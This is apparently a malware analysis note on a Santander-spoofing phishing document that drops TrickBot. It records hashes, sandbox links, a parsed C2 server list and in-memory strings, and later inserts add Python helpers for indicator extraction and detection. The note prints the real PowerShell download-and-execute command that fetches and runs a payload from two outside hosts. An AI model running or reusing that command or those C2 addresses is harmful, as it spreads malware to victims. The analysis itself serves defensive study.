- found by @neonprimetime security
- 6/5/2018 email
- subject: A new message or other communication has arrived
- attachment: Secure Message.doc
- rtf doc with equation editor exploit
- doc body spoofs Santander
- https://www.hybrid-analysis.com/sample/cea456017fff6be22984c7ad6668bebd21b8c57b4ce86853821cbbd15e8bfdb8?environmentId=100
- https://app.any.run/tasks/80ee23c0-f24e-4f9a-a4f5-7204ad97c725
- 1fe7c89e4269fd6f0d238ba38b0d1431
- run batch script
- CmD /C %tmp%\task.bat
- which runs powershell
- PowerShell -W Hidden ""function NIKTAHCOP([String] $holispit){(New-Object System.Net.WebClient).DownloadFile($holispit,'C:\Users\admin\AppData\Local\Temp\anipaydnihS.exe');Start-Process 'C:\Users\admin\AppData\Local\Temp\anipaydnihS.exe';}try{NIKTAHCOP('http://groupstalks.com/news.bin')}catch{NIKTAHCOP('http://iaecconsultants.com/news.bin')}""
- url it downloads from
- http://groupstalks.com/news.bin
- which downloads (no longer available now)
- 9ab498fc22237101236fb0048709795b
- to
- C:\Users\admin\AppData\Local\Temp\anipaydnihS.exe
- appears related to trickbot per comments
- https://myonlinesecurity.co.uk/fake-santander-bank-a-new-message-or-other-communication-has-arrived-delivers-trickbot/
- fallback url (catch block in the powershell above): iaecconsultants.com/news.bin
- copies itself to and runs from
- C:\Users\xxx\AppData\Roaming\logowin\newt.bin.exe
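Added example (not part of the original paste): a small Python triage helper for the task.bat / PowerShell stage above. It undoes cmd.exe's "" quote escaping, separates the try-block URL from the catch-block fallback, pulls out the drop path and the Start-Process target, and applies a few command-line checks a log pipeline could use. The sample line is copied from the note; the function and check names are my own.

```python
import re
from urllib.parse import urlparse

# Constructed sample: the task.bat line from the analysis above. The doubled
# quotes ("") are how cmd.exe carries a literal " inside a quoted argument.
TASK_BAT_LINE = (
    r'''PowerShell -W Hidden ""function NIKTAHCOP([String] $holispit){'''
    r'''(New-Object System.Net.WebClient).DownloadFile($holispit,'C:\Users\admin\AppData\Local\Temp\anipaydnihS.exe');'''
    r'''Start-Process 'C:\Users\admin\AppData\Local\Temp\anipaydnihS.exe';}'''
    r'''try{NIKTAHCOP('http://groupstalks.com/news.bin')}'''
    r'''catch{NIKTAHCOP('http://iaecconsultants.com/news.bin')}""'''
)

URL_RE = re.compile(r"https?://[^\s'\"()]+")


def unescape_cmd_quotes(line):
    """cmd.exe passes "" inside a quoted argument through as one literal quote,
    so PowerShell itself sees the script as a single double-quoted string."""
    return line.replace('""', '"')


def parse_downloader(line):
    """Pull the IOCs out of a download-and-execute one-liner of the shape above."""
    ps = unescape_cmd_quotes(line)
    hidden = re.search(r"-W(?:indowStyle)?\s+Hidden", ps, re.I) is not None
    func = re.search(r"function\s+([\w-]+)", ps)
    drop = re.findall(r"DownloadFile\(\s*\$\w+\s*,\s*'([^']+)'\s*\)", ps)
    executed = re.findall(r"Start-Process\s+'([^']+)'", ps)
    # try{...}catch{...}: the first URL is the primary, the second the fallback.
    block = re.search(r"try\s*\{(.*?)\}\s*catch\s*\{(.*?)\}", ps, re.S)
    primary = URL_RE.findall(block.group(1)) if block else []
    fallback = URL_RE.findall(block.group(2)) if block else []
    all_urls = primary + fallback if block else URL_RE.findall(ps)
    hosts = []
    for u in all_urls:
        h = urlparse(u).hostname
        if h and h not in hosts:
            hosts.append(h)
    return {
        "hidden_window": hidden,
        "function": func.group(1) if func else None,
        "primary_urls": primary,
        "fallback_urls": fallback,
        "drop_paths": drop,
        "executed_paths": executed,
        "hosts": hosts,
    }


def command_line_hits(line):
    """Cheap checks a process-creation log source could run on the raw line.
    Check names are my own, not from any published rule set."""
    ps = unescape_cmd_quotes(line)
    checks = {
        "powershell_hidden_window": re.search(r"-W(?:indowStyle)?\s+Hidden", ps, re.I),
        "webclient_downloadfile": re.search(r"Net\.WebClient\)\.DownloadFile", ps, re.I),
        "start_process_from_temp": re.search(r"Start-Process\s+'[^']*\\Temp\\", ps, re.I),
        "remote_bin_payload": re.search(r"https?://\S+\.bin\b", ps, re.I),
    }
    return [name for name, m in checks.items() if m]


if __name__ == "__main__":
    for k, v in parse_downloader(TASK_BAT_LINE).items():
        print(f"{k}: {v}")
    print("hits:", command_line_hits(TASK_BAT_LINE))
```

Note the drop path is hard-coded to the sandbox user (admin), which is why the same path shows up in both DownloadFile and Start-Process; on a real victim this would only work if that profile exists, so the path itself is a weak indicator while the host names and the try/catch fallback pattern are the useful ones.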
- ---------
- interesting in-memory strings
- ---------
- 0x28d180 (115): https://182.253.210.130:449/ser0605/[redactedinfo]_W617601.3C4F081FB772C6C5336BEA899B16365D/63/networkDll/start/(null)//
- 0x28e960 (26): 208.75.117.70
- 0x2911d4 (38): 185.228.233.225:447
- 0x2b4b40 (80): C:\Users\XXX\AppData\Roaming\logowin\
- 0x2c22bc (2172): <mcconf>
- <ver>1000208</ver>
- <gtag>tt0002</gtag>
- <servs>
- <srv>109.95.116.37:443</srv>
- <srv>93.109.242.134:443</srv>
- <srv>41.211.9.226:443</srv>
- <srv>158.58.131.54:443</srv>
- <srv>86.125.39.173:443</srv>
- <srv>208.75.117.70:443</srv>
- <srv>185.168.185.218:443</srv>
- <srv>109.86.227.152:443</srv>
- <srv>185.129.78.167:443</srv>
- <srv>190.4.189.129:443</srv>
- <srv>65.30.201.40:443</srv>
- <srv>66.232.212.59:443</srv>
- <srv>80.53.57.146:443</srv>
- <srv>182.253.210.130:449</srv>
- <srv>92.55.251.211:449</srv>
- <srv>94.112.52.197:449</srv>
- <srv>209.121.142.202:449</srv>
- <srv>5.102.177.205:449</srv>
- <srv>209.121.142.214:449</srv>
- <srv>95.161.180.42:449</srv>
- <srv>185.42.192.194:449</srv>
- <srv>46.72.175.17:449</srv>
- <srv>144.48.51.8:443</srv>
- <srv>85.143.221.28:443</srv>
- <srv>89.223.88.55:443</srv>
- <srv>185.174.172.112:443</srv>
- <srv>194.87.93.6:443</srv>
- <srv>82.146.40.79:443</srv>
- <srv>104.193.252.167:443</srv>
- <srv>185.159.129.51:443</srv>
- </servs>
- 0x2d8660 (126): Please select an organism from the
- drop-down box. Once selected, an
- organism will turn BLACK for easy
- identification.
- 0x68b050 (20): START new simulation
- 0x68b0b0 (23): Stop current simulation
- 0x68b450 (16): # of Organisms:
- 0x68b4d0 (16): Amount of food:
- 0x6960e0 (55): Tanner Helland for InBio 365: Biological Life Simulator
- 0x6979c8 (23): Display dead organisms?
- 0x6980b7 (35):
- Regenerate food every (x) cycles:
- 0x6981d0 (27): Regenerate this much food:
- 0x6982df (31): Food grants this much energy:
- 0x6984e7 (27):
- Multiply every (x) cycles:
- 0x6985f7 (27):
- New DNA mutates (x) bases:
- 0x6987f0 (31): Save simulation data to file...
- 0x698b38 (116): Press the start button to begin the simulator --------------------------------------------------------------------->
- 0x698bb7 (27):
- Please start the simulator
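Added example (not part of the original paste): a Python parser for the <mcconf> blob in the in-memory strings above. The dump is truncated (no closing </mcconf>), so it uses regexes instead of an XML parser, then cross-checks the other network strings from the same dump (the :449 beacon URL and the loose IPs) against the server list. The config excerpt, beacon URL and loose strings are copied from the note (only a subset of the 30 servers is embedded); the beacon path field names follow the commonly documented TrickBot layout and are labelled as an assumption in the code.

```python
import re
from collections import Counter
from urllib.parse import urlsplit

# Constructed sample: an excerpt of the <mcconf> blob dumped from memory (the
# full list on the page has 30 entries). The dump is truncated, with no closing
# </mcconf>, so the parser must not require well-formed XML.
MCCONF_DUMP = """<mcconf>
<ver>1000208</ver>
<gtag>tt0002</gtag>
<servs>
<srv>109.95.116.37:443</srv>
<srv>208.75.117.70:443</srv>
<srv>185.159.129.51:443</srv>
<srv>182.253.210.130:449</srv>
<srv>92.55.251.211:449</srv>
</servs>
"""

# Constructed: the beacon URL and loose network strings found near the config.
BEACON_URL = ("https://182.253.210.130:449/ser0605/[redactedinfo]_W617601."
              "3C4F081FB772C6C5336BEA899B16365D/63/networkDll/start/(null)//")
LOOSE_STRINGS = ["208.75.117.70", "185.228.233.225:447"]

SRV_RE = re.compile(r"<srv>\s*(\d{1,3}(?:\.\d{1,3}){3}):(\d{1,5})\s*</srv>")


def parse_mcconf(blob):
    """Return ver, gtag and the (ip, port) server list from a possibly truncated dump."""
    ver = re.search(r"<ver>\s*(\d+)\s*</ver>", blob)
    gtag = re.search(r"<gtag>\s*([^<]+?)\s*</gtag>", blob)
    servers = [(ip, int(port)) for ip, port in SRV_RE.findall(blob)]
    return {
        "ver": ver.group(1) if ver else None,
        "gtag": gtag.group(1) if gtag else None,
        "servers": servers,
    }


def port_histogram(conf):
    """Number of C2 entries per port, handy for a quick egress rule."""
    return Counter(port for _, port in conf["servers"])


def parse_beacon(url):
    """Split a beacon URL into host/port and path fields. The field names are
    an assumption based on the commonly documented TrickBot layout
    /<gtag>/<client id>/<command>/...; the dump itself does not label them."""
    u = urlsplit(url)
    parts = [p for p in u.path.split("/") if p]
    keys = ["gtag", "client_id", "command", "module", "action"]
    return {"host": u.hostname, "port": u.port, **dict(zip(keys, parts))}


def correlate(conf, beacon_url, loose_strings):
    """Check which other network strings in the dump the config explains."""
    ips = {ip for ip, _ in conf["servers"]}
    pairs = set(conf["servers"])
    beacon = parse_beacon(beacon_url)
    matched = [s for s in loose_strings if s.split(":")[0] in ips]
    unmatched = [s for s in loose_strings if s.split(":")[0] not in ips]
    return {
        "beacon": beacon,
        "beacon_in_config": (beacon["host"], beacon["port"]) in pairs,
        # The gtag seen on the wire can differ from the one in the config that
        # is currently in memory, so surface the mismatch instead of assuming.
        "gtag_mismatch": beacon.get("gtag") != conf["gtag"],
        "loose_matched": matched,
        "loose_unmatched": unmatched,
    }


def to_iocs(conf):
    """Sorted ip:port lines suitable for a blocklist or a hunt query."""
    return sorted(f"{ip}:{port}" for ip, port in conf["servers"])


if __name__ == "__main__":
    conf = parse_mcconf(MCCONF_DUMP)
    print(conf["ver"], conf["gtag"], dict(port_histogram(conf)))
    print(correlate(conf, BEACON_URL, LOOSE_STRINGS))
    print("\n".join(to_iocs(conf)))
```

Running it on the excerpt shows the :449 beacon target is one of the configured servers, the loose 208.75.117.70 string is also in the list, while 185.228.233.225:447 is not in this config and needs separate follow-up; the gtag on the wire (ser0605) does not match the tt0002 in the dumped config, which is worth noting rather than silently picking one.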